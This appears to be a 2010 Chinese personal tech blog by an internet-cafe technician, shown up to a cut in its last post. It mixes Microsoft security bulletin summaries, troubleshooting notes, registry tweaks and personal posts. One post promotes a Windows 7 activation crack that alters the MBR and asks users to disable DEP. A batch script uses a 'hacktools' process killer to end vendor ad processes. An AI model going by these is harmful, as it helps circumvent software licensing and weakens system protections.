poison's blog

关于某事

180045@163.com(毒药) — Sun,15 Aug 2010 01:03:02 +0800

现在联盟反作弊规则很强，所以刷网吧主页联盟的软件不再提供更新，已删除下载连接，大家还是该干啥的就干啥去吧。
毒药唯一的QQ号：86764050，拿这个小玩意来卖钱的~不说了，你们懂的。

Microsoft 安全公告摘要（2010 年 8 月）

180045@163.com(毒药) — Sat,14 Aug 2010 03:00:46 +0800

2010 年 8 月安全公告包含以下 15 个安全漏洞：

严重等级 9 个：
1.MS10-046：Windows Shell 中的漏洞可能允许远程执行代码 (2286198)【快捷方式图标加载漏洞】
http://www.microsoft.com/china/technet/security/bulletin/MS10-046.mspx

2.MS10-049：SChannel 中的漏洞可能允许远程执行代码 (980436)
http://www.microsoft.com/china/technet/security/bulletin/MS10-049.mspx

3.MS10-051：Microsoft XML Core Services 中的漏洞可能允许远程执行代码 (2079403)
http://www.microsoft.com/china/technet/security/bulletin/MS10-051.mspx

4.MS10-052：Microsoft MPEG Layer-3 编码解码器中的漏洞可能允许远程执行代码 (2115168)
http://www.microsoft.com/china/technet/security/bulletin/MS10-052.mspx

5.MS10-053：Internet Explorer 的累积性安全更新 (2183461)
http://www.microsoft.com/china/technet/security/bulletin/MS10-053.mspx

6.MS10-054：SMB 服务器中的漏洞可能允许远程执行代码 (982214)
http://www.microsoft.com/china/technet/security/bulletin/MS10-054.mspx

7.MS10-055：Cinepak 编解码器中的漏洞可能允许远程执行代码 (982665)
http://www.microsoft.com/china/technet/security/bulletin/MS10-055.mspx

8.MS10-056：Microsoft Office Word 中的漏洞可能允许远程执行代码 (2269638)
http://www.microsoft.com/china/technet/security/bulletin/MS10-056.mspx

9.MS10-060：Microsoft .NET 公共语言运行时和 Microsoft Silverlight 中的漏洞可能允许远程执行代码 (2265906)
http://www.microsoft.com/china/technet/security/bulletin/MS10-060.mspx

重要等级 6 个：

1.MS10-047：Windows 内核中的漏洞可能允许特权提升 (981852)
http://www.microsoft.com/china/technet/security/bulletin/MS10-047.mspx

2.MS10-048：Windows 内核模式驱动程序中的漏洞可能允许特权提升 (2160329)
http://www.microsoft.com/china/technet/security/bulletin/MS10-048.mspx

3.MS10-050：Windows Movie Maker 中的漏洞可能允许远程执行代码 (981997)
http://www.microsoft.com/china/technet/security/bulletin/MS10-050.mspx

4.MS10-057：Microsoft Office Excel 中的漏洞可能允许远程执行代码 (2269707)
http://www.microsoft.com/china/technet/security/bulletin/MS10-057.mspx

5.MS10-058：TCP/IP 中的漏洞可能允许特权提升 (978886)
http://www.microsoft.com/china/technet/security/bulletin/MS10-058.mspx

6.MS10-059：Tracing Feature for Services 中的漏洞可能允许特权提升 (982799)
http://www.microsoft.com/china/technet/security/bulletin/MS10-059.mspx

http://www.microsoft.com/china/technet/Security/bulletin/ms10-aug.mspx

Microsoft 安全公告摘要（2010 年 7 月）

180045@163.com(毒药) — Sat,14 Aug 2010 02:57:26 +0800

本公告摘要列出了 2010 年 7 月发布的安全公告。

MS10-042
帮助和支持中心中的漏洞可以允许远程执行代码 (2229593)

此安全更新用于解决 Windows XP 和 Windows Server 2003 受支持版本附带的 Windows 帮助和支持中心功能中的公开漏洞。如果用户使用 Web 浏览器查看特制网页或单击电子邮件中的特制链接，此漏洞可以允许远程执行代码。此漏洞无法通过电子邮件自动加以利用。攻击要想成功，用户必须单击电子邮件中列出的链接。
严重

Microsoft Windows

MS10-043
Canonical Display Driver 中的漏洞可能允许远程执行代码 (2032276)

此安全更新用于解决 Canonical Display Driver (cdd.dll) 中公开披露的漏洞。尽管该漏洞可能允许执行代码，但不太可能因内存随机化而成功。大多数情况下，成功利用漏洞的攻击者更可能使受影响的系统停止响应并自动重新启动。
严重

Microsoft Windows

MS10-044
Microsoft Office Access ActiveX 控件中的漏洞可以允许远程执行代码 (982335)

此安全更新解决 Microsoft Office Access ActiveX 控件中两个秘密报告的漏洞。如果用户打开特制 Office 文件或查看已实例化 Access ActiveX 控件的网页，则漏洞可以允许远程执行代码。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
严重

Microsoft Office

MS10-045
Microsoft Office Outlook 中的漏洞可以允许远程执行代码 (978212)

此安全更新可解决一个秘密报告的漏洞。如果用户使用受影响的 Microsoft Office Outlook 版本打开特制的电子邮件中的附件，则此漏洞可以允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
重要

Microsoft Office

『山水音乐节』

180045@163.com(毒药) — Thu,15 Jul 2010 14:45:32 +0800

    为期5天的音乐节终于开锣了，兴冲冲的赶到现场，更多的只是失望，一堆堆的后摇乐队，我所喜欢的重金属是一支也没的。

图一：等待开场的美女

图二：忘了是啥乐队了，混杂的电子乐充斥着整个现场。

图三：闻歌起舞的某游客，貌似听的很HIGH。

图四：盲人歌手周云蓬，值得起敬。

图五：四川马赛克乐队，这个造型还可以嘛。

图六：马赛克乐队主唱，吼叫不断。

图七：另一个角度看全场，小城市的氛围就是差劲。

图八：唯一一支熟悉的乐队“与非门”，BASS手。

图九：“与非门”主唱，不是蒋凡。

    晚上11点，“与非门”唱完之后就草草结束了今天的音乐节，不喜欢的Post-Rock、GA比游客多的现场、袋装的花生“美食”，一切的一切，一次无聊的音乐节。

接18号下午，现场人比第一天多了几倍，有几支互动很不错，几十人POGO，一首歌下来我也声嘶力竭了。

计算机安全员考试题库

180045@163.com(毒药) — Thu,01 Jul 2010 14:13:37 +0800

刚考完，还要继续考，郁闷！整理一下。

点击下载此文件
点击下载此文件
点击下载此文件

最近碰到的故障两则

180045@163.com(毒药) — Wed,30 Jun 2010 00:40:02 +0800

一、磁盘速度变慢？
    说起来真的很诡异，帮某网吧配了台S3200 + 4G DDRII800 + 2X500G做游戏服务器，为了方便我把另一网吧的WIN2003随手拷过去就装了，GHOST完也不用装驱动，可是奇怪的事情就发生了，装完易游后用客户机测速只有2M/S，排除网络问题后，把故障定位在服务器上，用HDTUNE一测，乖乖~无论任何一个盘读取速度都只有2-3M/S，还是新配的机器！我RI！卸载易游服务端无果，无计可施的情况下还原了系统，这回正常了。顺着思路回想操作，最后发觉是自己在BOOT.INI中加了/PAE参数所致，询问了一下别人，都不明白为什么。

二、30M光纤带60台机会卡？
    也是这间网吧，那技术员和我说自从上次神魔大战后网络就开始卡了，期间我也远程过几次，调整过ROS的设置等等也是一样。按照他的描述是当网内有几台机开迅雷或酷狗（带上传类软件）时，整个网络就会卡到网页也打不开，按理说30M带宽是足够保证100-200台机器流畅运行的，这是什么回事呢？答案在解决上面问题后第N分钟找到：无意间看了下路由外网网卡的传输模式——半双工！什么概念？就是同一时间只能下载或上传，当有机器上传时，你玩游戏或开网页等需要下载的不卡才怪！
    解决方法：把“光猫”背面的跳线随便跳（要断电），跳一次看一次，直到路由外网网卡显示全双工模式就成功了。
    PS：据在电信机房的朋友所说，就算以前是全双工，也有可能由于设置老化等原因会造成与“光猫”连接的设备工作在半双工模式。

口罩姬爱川动漫热舞

180045@163.com(毒药) — Thu,17 Jun 2010 05:29:43 +0800

网络真是能人辈出，记忆中的日本网络红人就只有一个“伪娘吉他手”，口罩姬？萌杀我了。

顺便说一下，背景音乐叫做《ルカルカ★ナイトフィーバー》，是用VOCALOID电子音乐制作语音合成软件创作的一首原创歌曲，玩了这么久的MIDI，我才知道有这么个软件，晕菜了。

软件介绍

开发者 Yamaha
　初始版本 VOCALOID：2004年1月
　最新稳定版 VOCALOID2
　操作系统 Windows 2000/XP
　可用语言英语、日语
　类型音乐软件
　网站 www.vocaloid.com

网吧正版化之路还有多远?

180045@163.com(毒药) — Wed,16 Jun 2010 05:18:12 +0800

      前阵子的微软起诉东莞动感网络侵权一案至今日为止还没有确实结果，据路边社的消息说似乎是陷进了僵局，先且不去聊当中所涉及的“天文数字”的赔偿金额，就这一个案背后所引申出来的暗示，无一不在警示着网吧正面临着一场即将到来的暴风雨。

    然而网吧真的危机四伏了吗？我看也未必。

    一、网吧是中国互联网发展的中流砥柱，也主导着中国互联网未来的发展。在我们这批80后的眼中，它所经历的波折还少吗？从蓝极速事件到被妖魔化，从整顿到地方关闭网吧，每一次都牵动着网吧老板们的神经，每一次都倒下一批先驱，但网吧就像一只打不死的小强——顽强得无与伦比，只要有利益的存在，网吧就从不言败！

    二、微软能忍。WIN31到WINXP时间够长了吧，微软不也挺了过来？MS这些年来就像一个小丑般隔三差五的出来发表些关于中国盗版危害的观点（当然MS不会是小丑，这是人家的战略），也不见蹦出啥风浪来着，我们也乐得作壁上观，优哉游哉，好不潇洒。

    三、自家事自家理，正版只能是内部的斗争。现今的网吧生存在四大部门的监管之下，在平时，监管指的当然是“监控与管理”，但面对“恶势力”之时，这个“监”字为何不能理解成“监护”呢？网吧虽说不上是税收大户，但为GDP也出了些微不足道的力气（相对网吧自然是吃力不讨好），在地方保护政策的干扰下，最后势必大事化小，小事化更小（从庭审延期之事可见一斑）。某人旁白：GG不也赶跑了嘛，微软件是迟早的事儿。

    今次微软此举在我看来也只限于表态，结果如何给网吧所带来的影响只能是一阵微风。或者有人会说：这是微软在铺路。确实，但这条路很漫长。

    PS：因近日无相关软件、经验之类日志分享，特闲谈一番，亦称扯淡、胡吹。

Adobe Flash Player(10.1.53.64) for IE

180045@163.com(毒药) — Mon,14 Jun 2010 04:38:01 +0800

      尽管受到苹果的批评和开放网站标准的支持者的批评，Flash平台的开发仍在继续。 Adobe今天发了最终版本的10.1版Flash浏览器插件。Adobe去年11月发布了Flash 10.1测试版，今年4月发布了一个候选发布版。Adobe今天发布的软件是第一个能够为台式电脑和Android 2.2设备上的移动Flash提供同样提供功能的最终发布版软件。


    Flash 10.1能够在支持的平台上实现硬件视频加速。但是，这个软件的预览版本在这方面包含一些瑕疵和不兼容的问题。目前还不清楚Adobe的最终版本是否修复了这些问题。不过，考虑到在低功率设备上传送高清视频时Flash 10.1的主要目标，可以肯定地推测Adobe正在努力支持尽可能多的兼容性设备。

    遗憾的是Mac OS X用户将不得不等待一段时间才能得到硬件加速的视频功能。用于Mac OS X操作系统的具有硬件加速功能的“Gala”版Flash Player还没有到最终发布阶段，目前可以下载一个候选发布版。最终版本应该会很快推出。

    用户可以直接从Adobe网站为自己的Windows PC或者Mac机下载Flash 10.1版。Android 2.2手机用户可以从Android市场下载。

Adobe Flash Player下载
静默安装参数：/INSTALL

Microsoft 安全公告摘要（2010 年 6 月）

180045@163.com(毒药) — Sun,13 Jun 2010 02:45:27 +0800

本公告摘要列出了 2010 年 6 月发布的安全公告。

MS10-033
媒体解压缩中的漏洞可能允许远程执行代码 (979902)

此安全更新可解决 Microsoft Windows 中两个秘密报告的漏洞。如果用户打开一个特制的媒体文件或从网站或提供 Web 内容的任何应用程序接收特制的流式内容，这些漏洞则可能允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
严重

Microsoft Windows

MS10-034
ActiveX Kill Bit 的累积性安全更新 (980195)

此安全更新可解决 Microsoft 软件的两个秘密报告的漏洞。对于 Microsoft Windows 2000、Windows XP、Windows Vista 和 Windows 7 的所有受支持版本，此安全更新的等级为“严重”；对于 Windows Server 2003、Windows Server 2008 和 Windows Server 2008 R2 的所有受支持版本，此安全更新的等级为“中等”。

如果用户使用 Internet Explorer 查看可实例化特定 ActiveX 控件的特制网页，则此漏洞可能允许远程执行代码。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。此更新也包括用于四个第三方 ActiveX 控件的 kill bit。
严重

Microsoft Windows

MS10-035
Internet Explorer 的累积性安全更新 (982381)

此安全更新可解决 Internet Explorer 中五个秘密报告的漏洞和一个公开披露的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看特制网页时允许远程执行代码。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
严重

Microsoft Windows、Internet Explorer

MS10-032
Windows 内核模式驱动程序中的漏洞可能允许特权提升 (979559)

此安全更新解决 Windows 内核模式驱动程序中两个公开披露的漏洞和一个秘密报告的漏洞。如果用户查看用特制 TrueType 字体呈现的内容，则该漏洞可能允许特权提升。
重要

Microsoft Windows

MS10-036
Microsoft Office 中的 COM 验证漏洞可能允许远程执行代码 (983235)

此安全更新解决了 Microsoft Office 中 COM 验证的一个秘密报告的漏洞。如果用户使用受影响的 Microsoft Office 版本打开特制的 Excel、Word、Visio、Publisher 或 PowerPoint 文件，则此漏洞可能允许远程执行代码。此漏洞无法通过电子邮件自动加以利用。用户必须打开电子邮件附件，以电子邮件为载体的攻击才会得逞。
重要

Microsoft Office

MS10-037
OpenType Compact 字体格式 (CFF) 驱动程序中的漏洞可能允许特权提升 (980218)

此安全更新解决了 Windows 的 OpenType Compact 字体格式 (CFF) 驱动程序中一个秘密报告的漏洞。如果用户查看用特制 CFF 字体呈现的内容，则该漏洞可能允许特权提升。攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。匿名用户无法利用此漏洞，也无法以远程方式利用此漏洞。
重要

Microsoft Windows

MS10-038
Microsoft Office Excel 中的漏洞可能允许远程执行代码 (2027452)

此安全更新可解决 Microsoft Office 中 14 个秘密报告的漏洞。如果用户打开特制的 Excel 文件，较严重的漏洞可能允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
重要

Microsoft Office

MS10-039
Microsoft SharePoint 中的漏洞可能允许特权提升 (2028554)

此安全更新解决了 Microsoft SharePoint 中一个公开披露和两个秘密报告的漏洞。如果攻击者说服目标 SharePoint 站点的一位用户单击特制链接，最严重的漏洞可能允许特权提升。
重要

Microsoft Office、Microsoft 服务器软件

MS10-040
Internet Information Services 中的漏洞可能允许远程执行代码 (982666)

此安全更新解决 Internet Information Services (IIS) 中的一个秘密报告的漏洞。如果用户收到特制的 HTTP 请求，该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。
重要

Microsoft Windows

MS10-041
Microsoft .NET Framework 中的漏洞可能允许篡改 (981343)

此安全更新解决了 Microsoft .NET Framework 中一个公开披露的漏洞。此漏洞可能允许篡改签名 XML 内容中的数据，而且检测不到。在定制应用中，安全影响取决于具体应用程序中签名内容的使用方式。签名 XML 消息通过安全通道（例如 SSL）传输的情况不受此漏洞影响。
重要

Microsoft Windows、Microsoft .NET Framework

删除系统中已卸下的隐藏设备

180045@163.com(毒药) — Sat,12 Jun 2010 03:12:16 +0800

对于网吧来说，这个很实用，特别是网卡。

一、运行 Devmgmt.msc set DEVMGR_SHOW_NONPRESENT_DEVICES=1
打开设备管理器后，灰色调的设备就是了。

二、我的电脑>属性>高级>环境变量
在系统变量里面，按"新建"，在“变量名”里面填入DEVMGR_SHOW_NONPRESENT_DEVICES，变量值填入“1”。

三、是使用注册表编辑器编辑以下注册表值来实现。

注册项：[HKEY_LOCAL_MACHINE SYSTEMCurrentControlSetControlSession ManagerEnvironment]

键值名：DEVMGR_SHOW_ NONPRESENT_DEVICES（字符串值）

值数据：1（0隐藏，1显示）

SuperOem7 V2 Win7激活 NT6正版体验最好用的激活程序

180045@163.com(毒药) — Fri,11 Jun 2010 08:44:06 +0800

激活领先技术：只需一次激活，即使重装，格式化，进入系统查看SLIC仍然是2.1,和硬激活相同。 Super版基于MBR引导技术，对系统启动影响较大，如果你是一位Oem7新用户，强烈建议您使用Oem7F系列（http://www.pccppc.com/show.php?tid=253），以免造成不必要的麻烦。如果你已经激活，那么你可以不必更新，如果你想升级至新技术，那么请一定记住，如果开机出现ERROR，请重启狂按BackSpace即可进入系统，然后卸载，丢失备份文件的请使用DiskGenuis修复MBR即可。

新特性
只需一次激活，即使重装，格式化，进入系统查看SLIC仍然是2.1。
国内第一款真正无引导文件的激活。
引导分区不受文件系统限制（NTFS/FAT32/或其他均可）
无需理会隐藏分区
不更改任何启动项
无任何引导文件
非一般软件模拟激活，采用引导扇区技术，和硬激活几乎相同
带有引导扇区备份技术
不更改主板和系统，保护主板安全和系统完整性。
启动无引导信息。
原创PE下修复系统引导！
原创自我检测模块，激活更放心。
支持32位和64位系统，支持多语言系统。
支持Vista/Win7/2008/2008R2同时激活。
支持所有品牌机，组装机，苹果机，虚拟机。
支持旗舰版，专业版，家庭高级版，家庭初级版，简易版，标准版，企业版等。
更多功能待你发现……

Oem7截图
简中系统

特殊选项说明
如果某些机型不能激活，请尝试更换RSDT/XSDT选项。

Q&A
Q: 在Windows 2008下,软件停止工作
A: 请务必在运行SuperOem7之前关闭数据执行保护（由于2008为服务器，系统安全默认开启了DEP数据执行保护），计算机-右键属性-高级系统设置-高级-性能-设置-数据执行保护-仅为基本Windows程序和服务启用DEP，激活完毕后关闭该选项即可。

鸣谢
本程序部分内容基于俄罗斯MBR引导技术，感谢Fujian前辈的提供。
感谢各位PCCPPC网友的测试与支持

下载地址（Download）

SuperOem7

『静』

180045@163.com(毒药) — Fri,11 Jun 2010 08:07:15 +0800

辰初娥眉雨，途人掩面行。
偶然得文章，失于一指间。
微风随露洒，炊烟正起时。
昏昏欲睡去，烦恼复又来。

AU3全汉化UDF第二版

180045@163.com(毒药) — Fri,11 Jun 2010 05:31:25 +0800

由蛋疼的netegg制作，大家掌声！

进度
2009/6---array/clipbook/color/debug/api(D)/ComboBox/Listview/Listbox/DateTimePicker/scrollbar
2009/7--word/GuiHeader/GuiMonthCal/GuiMenu/GuiSlider/GuiTab/GuiToobar/GuiTreeview/api
2009/8------memory
2009/9------excel
2009/11-----ftpex/inet/namedpipe/netshare/winnet/GuiRichedit/IE/VISA
2009/12-----winhttp/StructureConstant
2010/1/4----winapiex(v1.9)
2010/1/8----winapiex(v2.0)
2010/1/18--GDIPlus
2010/3/8----winapiex(v2.2)
2010/3/29--winapiex(v2.3)
2010/4/13--GdiPlusEx
2010/4/19--winapiex(v2.4)
2010/5/5----winapiex(v2.5)
2010/5/26--winapiex(v2.6)。未使用VISTA以上系统的就不必下载了。

纠错及修改:
2010/1/19--sound类的函数示例
2010/1/27--加密函数中两个函数的示例（感谢：水木子）
2010/3/22--原有_stringencrypt()函数不支持中文的问题
2010/3/29--添加_listview_moveitemsselected函数
2010/5/27--sqlite示例的外部输出

千脑网盘下载

Sugarsync云存储，Dropbox后的选择！

180045@163.com(毒药) — Mon,07 Jun 2010 22:15:52 +0800

Dropbox被墙，寻找其它云存储服务也是无奈之举，不过今天推介这个Sugarsync比起Dropbox毫不逊色。

体验SugarSync 强大功能

安全自动备份数据 — 以防系统崩溃。这正是SugarSync连续、实时备份您所有文件的原因。

随时随地访问资料 — 您的所有文件都可触手可得。只要您有网络连接，您便拥有了一个移动办公室。

移动设备获取资料 — 忘记携带您的电脑了吗？没问题，您只需在您的移动电话上访问 m.sugarsync.com 便可以获取您的所有文件。

实时同步 — 在多台电脑上存放同一个文件。任何一台电脑上对该文件所做的更改将都会被自动更新到其他电脑上。

1、中文版，且与Dropbox一样有2G免费空间

2、同样可以通过分享获得一次250M空间

3、可以自行设定同步目录，比Dropbox方便

如果还没注册，请使用我的邀请地址，这样你和我都将在2G免费空间基础上，获得250M的额外空间奖励：

https://www.sugarsync.com/referral?rf=bx7age0v8xrqo

屏蔽PUBWIN2009开机动画

180045@163.com(毒药) — Thu,03 Jun 2010 02:49:06 +0800

与PUBWIN2007不同的是，PUBWIN2007可以在服务端设置或路由禁止IP，而PUBWIN2009若使用2007的方法则控制台会出现错误，在还没找到更好的方法的前提下只能在客户机设置了。

批处理如下：

复制内容到剪贴板程序代码

1、cscript xcacls.vbs C:\progra~1\hintsoft\pubwinclient\ad\%computername% /t /g everyone:l
2、cscript xcacls.vbs C:\progra~1\hintsoft\pubwinclient\ad\%computername% /t /e /g everyone:w
3、for /f "delims=" %%a in ('dir C:\progra~1\hintsoft\pubwinclient\ad\%computername% /b') do Echo y| cacls C:\progra~1\hintsoft\pubwinclient\ad\%computername%\%%a /t /p everyone:w

xcacls.vbs 是高级权限设置，比系统自带的cacls.exe强多了。

C:\progra~1\hintsoft\pubwinclient\ad\%computername%

PUBWIN2009开机动画目录，%computername%为计算机名。

1、2句是将这个目录设置为列出目录和写入权限，3句——设置目录下的文件权限，有点多余，画蛇添足罢了。

经测试，完美解决开机时的动画广告，也可以在做母盘的时候先把这个目录的权限设置好。

发现了一个新问题，采用以上方法会导致PUBWIN后台JAVA.EXE CPU长期占用50%，应该是客户端不能返回广告统计数据而服务端不断握手重连造成。

XCACLS.VBS下载

网上再现“Android女”人美唱功绝

180045@163.com(毒药) — Wed,02 Jun 2010 01:09:10 +0800

继“iPhone女”Kim Yeo-hui走红网络之后，一名利用谷歌Android手机伴奏，展示一流唱功的所谓“Android女”再度引发网友关注。

25日网友“Aziia100”把标题为“Android女”的视频上传到YouTube网站，并介绍说：“继‘iPhone女’之后， ‘Android女’出场。”视频中的女性利用Android手机的音乐应用软件演奏吉他，同时演唱了美国当红女歌手蕾哈娜的歌曲《Take A Bow》。视频似乎是“Android女”自己拍摄的。

添加、去除win7桌面IE图标方法

180045@163.com(毒药) — Tue,01 Jun 2010 22:20:50 +0800

一、添加桌面的IE图标：将下面代码复制到记事本并保存为“添加IE图标.reg”（如果你的系统安装在C盘，就不用更改，如果在其他盘，就将盘符C改为你的系统盘符，附件里的用记事本打开更改）

复制内容到剪贴板程序代码

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}]
@="Internet Explorer"
"InfoTip"="@C:\\WINDOWS\\system32\\zh-CN\\ieframe.dll.mui,-881"
"LocalizedString"="@C:\\WINDOWS\\system32\\zh-CN\\ieframe.dll.mui,-880"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\DefaultIcon]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe,-32528"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell]
@=""
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\D]
@="删除(D)"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\D\Command]
@="Rundll32.exe"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\NoAddOns]
@="在没有加载项的情况下启动"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\NoAddOns\Command]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe about:NoAdd-ons"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\Open]
@="打开主页(H)"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\Open\Command]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\属性(R)]
@=""
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\Shell\属性(R)\Command]
@="Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"
[HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}\ShellFolder]
@=""
"Attributes"=dword:00000010
"HideFolderVerbs"=""
"WantsParseDisplayName"=""
"HideOnDesktopPerUser"=""
@="C:\\WINDOWS\\system32\\ieframe.dll,-190"
"HideAsDeletePerUser"=""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}]
@="Internet Explorer"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}]
@="Windows Media"

二、卸除IE8图标：如果不想在桌面添加IE图标了，可以删除桌面IE图标。方法如下。
新建一个记事本，写入如下内容，保存为“卸除IE8图标.reg”。

复制内容到剪贴板程序代码

Windows Registry Editor Version 5.00
[-HKEY_CLASSES_ROOT\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B416D21B-3B22-B6D4-BBD3-BBD452DB3D5B}]

IE6，滚回你的老窝！

180045@163.com(毒药) — Tue,01 Jun 2010 21:44:03 +0800

其实不是职业所需，一个浏览器只要能够成功浏览网页，哪怕只是IE4.0，我都懒得去装ff、safari、Opera等等各种浏览器。但由于技术是不断不断的更新，网页的表现效果越来越丰富，一方面我们必须打破旧有的东西，另外一方面，我们必须接受新的事物，基于追求完美的心态，如果现在你还在IE6或者IE6内核的浏览器，强烈建议你更新到IE7或者其他更新的浏览器...

IE6：喂! 你们! 为什么总不让我一起玩!
SAFARI：滚回家去，IE6!
OPERA：对啊，你经常把我们最酷的玩意儿弄坏!
FIREFOX：我都不敢相信你和那厮有瓜葛，IE7!
IE7：我靠，别哪壶不开提哪壶!

利用knlps关闭易游(pclx.exe)右下角弹窗广告

180045@163.com(毒药) — Sat,29 May 2010 04:58:13 +0800

易游的PCLX.EXE一直以来都是存在的，本来对它也没什么兴趣，反正也可以让客人去关闭。只是易游好像跟风跟上瘾了，看到360和金山爽的很，自家也不甘寂寞的搞了个“不能”关闭的右下角手机广告。怎说？大大的一个关闭按钮按下，哥按的不是关闭，是弹网址！操，只能在广告上点右键再按ALT+F4结束。

开冰刃看了下，还是pcl(数字).exe在做怪，没法子只能OOXX了。
在system.bat加上以下代码：

复制内容到剪贴板程序代码

ping 127.0.0.1 -n 10 ；这个时间要把握好，快了pclx.exe还没出现，慢了......也就慢了罢。
knlps.exe -l >pid.txt
findstr /i "pcl" pid.txt>pcl.txt
for /f "tokens=1 delims=* " %%i in (pcl.txt) do knlps.exe -k %%i
del pid.txt
del pcl.txt
ping 127.0.0.1 -n 3
del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pcl??.exe
del knlps.exe

点击下载此文件(因为是hacktools,请自行查毒)

pid.txt

复制内容到剪贴板程序代码

*1228 pcl9.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pcl9.exe
*1788 eyoorun.exe c:\program files\e-yoo\eyoorun.exe
...................
...................
略
2 Hidden Process(es) be Found.

pcl.txt

复制内容到剪贴板程序代码

*1228 pcl9.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pcl9.exe

电吉他之神！不是经典不发！

180045@163.com(毒药) — Thu,27 May 2010 05:13:08 +0800

那位哥们实在是太有才了。

Flash动画

在线播放

Microsoft 安全公告摘要（2010 年 5 月）

180045@163.com(毒药) — Thu,27 May 2010 03:22:28 +0800

本公告摘要列出了 2010 年 5 月发布的安全公告。

MS10-030
Outlook Express 和 Windows Mail 中的漏洞可能允许远程执行代码 (978542)

此安全更新解决 Outlook Express、Windows Mail 和 Windows Live Mail 中的一个秘密报告的漏洞。如果用户访问恶意电子邮件服务器，该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

受影响的软件

Microsoft Windows

MS10-031
Microsoft Visual Basic for Applications 中的漏洞可能允许远程执行代码 (978213)

此安全更新解决 Microsoft Visual Basic for Applications 中的一个秘密报告的漏洞。如果主机应用程序打开一个特制文件并将其传递到 Visual Basic for Applications runtime，此漏洞可以允许远程执行代码。如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

受影响的软件

Microsoft Office、Microsoft Visual Basic for Applications

让IE8界面换成经典的IE6

180045@163.com(毒药) — Wed,26 May 2010 18:16:41 +0800

现在IE8已经成为越来越多用户的选择，尽管这样，还是有很多用户并不习惯IE8的界面布局，例如在IE8界面中，菜单栏居然位于工具栏的下面。此外，IE8当中的搜索工具条也没有什么必要，因为我们更习惯打开网站搜索。下面，笔者就教大家如何还原IE8的经典界面。

地址栏，请让位

　　怎样才能实现将IE8界面中菜单栏和工具栏对调，使得菜单栏处于界面的最上端呢？其实，我们通过修改注册表就可以实现这一目的，具体说来，我们需要执行以下操作。

　　单击“开始→运行”，然后在弹出的“运行”对话框中输入“Regedit”，接着按下回车键打开注册表编辑器并定位到“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser”分支下；再右击右边的空白区域，选择“新建→DWORD值”，新建一个名为“ITBar7Position”的DWORD值，并将其数值数据修改为“1”再单击“确定”按钮就可以了。

　　完成上述操作后，我们对注册表所做的修改就能立刻生效。重新运行IE8，在打开的页面中大家就会发现菜单栏处于IE8界面的最上端了。

搜索栏，请离开

　　去掉IE8工具栏中的搜索框，只需要修改组策略就可以轻松搞定，操作步骤如下：

